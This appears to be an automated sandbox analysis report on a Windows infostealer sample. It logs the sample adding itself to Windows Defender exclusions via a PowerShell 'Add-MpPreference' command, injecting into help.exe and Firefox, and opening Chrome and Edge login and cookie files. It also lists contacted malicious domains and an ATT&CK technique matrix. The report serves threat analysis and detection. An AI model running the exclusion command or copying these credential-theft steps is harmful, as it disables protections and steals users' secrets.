                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe
                    NtAllocateVirtualMemory: Direct from: 0x77172BFC
                    NtDelayExecution: Direct from: 0x77172DDC
                    NtQuerySystemInformation: Direct from: 0x77172DFC
                    NtReadFile: Direct from: 0x77172ADC
                    NtQueryInformationProcess: Direct from: 0x77172C26
                    NtResumeThread: Direct from: 0x77172FBC
                    NtWriteVirtualMemory: Direct from: 0x7717490C
                    NtCreateUserProcess: Direct from: 0x7717371C
                    NtOpenKeyEx: Direct from: 0x77172B9C
                    NtNotifyChangeKey: Direct from: 0x77173C2C
                    NtSetInformationProcess: Direct from: 0x77172C5C
                    NtProtectVirtualMemory: Direct from: 0x77172F9C
                    NtResumeThread: Direct from: 0x771736AC
                    NtMapViewOfSection: Direct from: 0x77172D1C
                    NtWriteVirtualMemory: Direct from: 0x77172E3C
                    NtCreateMutant: Direct from: 0x771735CC
                    NtDeviceIoControlFile: Direct from: 0x77172AEC
                    NtAllocateVirtualMemory: Direct from: 0x77172BEC
                    NtTerminateThread: Direct from: 0x77172FCC
                    NtQueryInformationToken: Direct from: 0x77172CAC
                    NtCreateFile: Direct from: 0x77172FEC
                    NtOpenFile: Direct from: 0x77172DCC
                    NtClose: Direct from: 0x77172B6C
                    NtSetInformationThread: Direct from: 0x771663F9
                    NtAllocateVirtualMemory: Direct from: 0x77173C9C
                    NtQueryAttributesFile: Direct from: 0x77172E6C
                    NtSetInformationThread: Direct from: 0x77172B4C
                    NtReadVirtualMemory: Direct from: 0x77172E8C
                    NtCreateKey: Direct from: 0x77172C6C
                    NtQueryVolumeInformationFile: Direct from: 0x77172F2C
                    NtAllocateVirtualMemory: Direct from: 0x771748EC
                    NtQuerySystemInformation: Direct from: 0x771748CC
                    NtOpenSection: Direct from: 0x77172E0C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Memory written: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Section loaded: NULL target: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Section loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\help.exe Section loaded: NULL target: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe protection: read write
                Source: C:\Windows\SysWOW64\help.exe Section loaded: NULL target: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\help.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\help.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 7880
                Source: C:\Windows\SysWOW64\help.exe Thread APC queued: target process: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Process created: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe Process created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"
                Source: C:\Windows\SysWOW64\help.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000000.1345667156.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723382472.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000000.1494776343.0000000000D61000.00000002.00000001.00040000.00000000.sdmp
                    Binary or memory string: Shell_TrayWnd
                    Binary or memory string: Progman
                    Binary or memory string: Program ManagerW
                    Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe
                    Queries volume information: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Queries volume information: C:\ VolumeInformation
                    Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000005.00000002.1425567653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.3723926592.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.3723986742.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.3721644285.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1513121982.00000000070B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000E.00000002.3726633182.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000002.3723823865.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1427356722.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\help.exe
                    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                    File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000005.00000002.1425567653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.3723926592.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.3723986742.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.3721644285.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1513121982.00000000070B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000E.00000002.3726633182.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000002.3723823865.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1427356722.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Behavior Graph
                ID: 1633494; Sample: Zjf9D3oDifslon7.bat.exe; Startdate: 10/03/2025; Architecture: WINDOWS; Score: 100

                Top level
                  DNS/IP: www.quantumxr.xyz; www.lingkungan.xyz (Performs DNS queries to domains with low reputation); 17 other IPs or domains
                  Signatures: Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 5 other signatures

                Process tree
                • Zjf9D3oDifslon7.bat.exe 4 (started)
                  Dropped file: C:\Users\user\...\Zjf9D3oDifslon7.bat.exe.log, ASCII
                  Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                  • Zjf9D3oDifslon7.bat.exe (started)
                    Signatures: Maps a DLL or memory area into another process
                    • nS7xrGJCV5KYH1dhdb.exe (injected)
                      Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                      • help.exe 13 (started)
                        Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                        • nS7xrGJCV5KYH1dhdb.exe (injected)
                          Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                          DNS/IP: www.lingkungan.xyz 13.248.169.48, 49697, 49698, 49700 AMAZON-02US United States
                          DNS/IP: www.klass.team 77.222.42.122, 49748, 49749, 49750 SWEB-ASRU Russian Federation
                          DNS/IP: 11 other IPs or domains
                        • firefox.exe (started)
                  • powershell.exe 23 (started)
                    Signatures: Loading BitLocker PowerShell Module
                    • WmiPrvSE.exe (started)
                    • conhost.exe (started)

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.